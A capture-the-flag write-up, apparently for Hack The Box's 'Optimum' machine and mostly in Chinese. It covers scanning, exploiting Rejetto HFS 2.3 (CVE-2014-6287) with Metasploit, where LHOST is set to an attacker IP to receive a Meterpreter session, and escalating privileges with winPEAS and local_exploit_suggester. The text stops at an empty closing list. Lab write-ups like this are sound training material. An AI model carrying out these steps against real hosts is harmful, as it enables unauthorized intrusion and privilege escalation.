
Writeup of the Optimum machine from Hack The Box. This walkthrough covers the exploitation of Rejetto HttpFileServer 2.3 (CVE-2014-6287) to gain initial access, followed by privilege escalation on a Windows host using enumeration techniques and post-exploitation tools.
在这台机器上,目标是利用一个脆弱Web服务获取对Windows主机的初始访问权限,然后提升权限以获取管理员flag。
攻击路径包括:
我们首先进行全TCP端口扫描以识别暴露的服务。
nmap -Pn -n -p- --min-rate 5000 -T4 <TARGET_IP>
扫描显示 80 端口 打开。
接下来,我们进行服务及版本扫描。
nmap -p80 -sSCV --min-rate 5000 -T4 <TARGET_IP>
结果识别出以下服务:
HttpFileServer 2.3
该服务对应 Rejetto HTTP File Server,一个轻量级的文件共享Web服务器。
在研究检测到的版本后,我们发现一个已知漏洞:
CVE-2014-6287
该漏洞由于输入清理不当,允许远程代码执行。
为了利用该漏洞,我们使用 Metasploit。
启动 Metasploit:
msfconsole -q
搜索合适的模块:
search rejetto
加载利用模块:
use exploit/windows/http/rejetto_hfs_exec
配置所需选项:
set RHOSTS <TARGET_IP>
set RPORT <TARGET_PORT>
set LHOST <ATTACKER_IP>
set LPORT <ATTACKER_PORT>
run
执行后,利用将在目标机器上提供一个 Meterpreter 会话。
利用获取的Meterpreter会话,我们浏览文件系统以检索 用户flag。
cd
cat user.txt
whoami
命令输出显示我们以以下身份登录:
kostas
由于该用户没有管理员权限,我们继续进行权限提升。
为了识别潜在的权限提升向量,我们上传 WinPEAS,一个知名的Windows权限提升枚举工具。
upload /usr/share/peass/winpeas/winPEAS.exe C:\Users\kostas\Desktop\wp.exe
然后我们执行它:
shell
.\wp.exe
输出揭示了有用的信息,包括与用户 kostas 相关联的凭据。
在回顾可能的提升向量后,我们使用Metasploit模块:
local_exploit_suggester
加载模块:
use post/multi/recon/local_exploit_suggester
配置会话:
set SESSION <SESSION_NUMBER>
run
该模块会建议可用于提升权限的本地利用方法。
成功提升权限后,我们获得一个具有管理员权限的shell。
验证:
shell
whoami
获得管理员权限后,我们导航到Administrator目录以检索 root flag。
cd \Users\Administrator
dir
cd Desktop
dir
type root.txt
这台机器展示了几个重要的渗透测试概念: